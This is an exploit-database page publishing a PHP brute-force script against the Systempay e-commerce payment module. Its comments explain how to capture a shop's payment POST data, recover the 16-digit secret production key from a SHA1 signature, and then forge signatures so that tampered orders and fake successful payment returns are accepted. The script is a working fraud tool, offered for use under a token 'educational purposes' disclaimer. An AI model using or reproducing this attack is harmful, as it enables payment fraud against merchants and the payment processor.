Ecommerce Systempay 1.0 Brute Force

2020.02.07
Credit: live3
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Ecommerce Systempay 1.0 - Production KEY Brute Force # Author: live3 # Date: 2020-02-05 # Vendor Homepage: https://paiement.systempay.fr/doc/fr-FR/ # Software Link: https://paiement.systempay.fr/doc/fr-FR/module-de-paiement-gratuit/ # Tested on: MacOs # Version: ALL <?php /** * * INFORMATION * Exploit Title: Ecommerce Systempay decode secret production KEY / Brute Force * Author: live3 * Date: 2020-02-05 * Vendor Homepage: https://paiement.systempay.fr/doc/fr-FR/ * Tested on: MacOs * Version: ALL * Prerequisite: Find a ecommerce who is using Systempay AND SHA1 to crypt signature. * Put some product on cart and choose systempay for payment method. * get all data from post sent to https://paiement.systempay.fr/vads-payment/ * keep signature as reference and all vads fields to create new signature. * Use script to make a brute force on Secret product key (16 char length) * * Usage: Once you have the production KEY all modifications on form data will be accepted by systempay ! (You will just generate new signature with your changes) * You will be able to generate a success payment return ! * * FOR EDUCATIONAL PURPOSES ONLY. DO NOT USE THIS SCRIPT FOR ILLEGAL ACTIVITIES. * THE AUTHOR IS NOT RESPONSIBLE FOR ANY MISUSE OR DAMAGE. * */ // Set the start number you want (16 char length) $last_key_check = '1000000000000000'; // Assign var $array_key = array(); $sentence = ''; $how_many_key_to_check_for_loop = 10; // Put here signature extract from POST DATA // Example of SHA1 from string : test $signature_from_post = 'a94a8fe5ccb19ba61c4c0873d391e987982fbbd3'; // Copy paste your content decoded of POST DATA $form_data = ' vads_field_1: VALUE1 vads_field_2: VALUE2 // AND ALL OTHER FIELDS... '; $array = explode(PHP_EOL, $form_data); foreach ($array as $data) { if ($data != '') { $elements = explode(': ', $data); if (!empty($elements)) { $array_key[trim($elements[0])] = $elements[1]; } } } ksort($array_key); foreach ($array_key as $value) { $sentence .= $value . '+'; } echo 'Signature from POST DATA : '.$signature_from_post.'<br/>'; $found = false; $get_key = ''; // first check if (sha1($sentence.$last_key_check) != $signature_from_post) { for ($i = $last_key_check; $i <= $last_key_check+$how_many_key_to_check_for_loop; $i++) { $get_key = $i; if (sha1($sentence.$i) == $signature_from_post) { echo 'Key found : '.$i.'<br/>'; $found = true; break; } } } else { $found = true; } if ($found) { $test_sha = sha1($sentence.$get_key); echo 'Signature calc : '.$test_sha.'<br/><hr/>'; } else { echo 'Last key check : '.$get_key.'<br/><hr/>'; } echo 'Your sequence : '.$sentence.'<br/>';


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top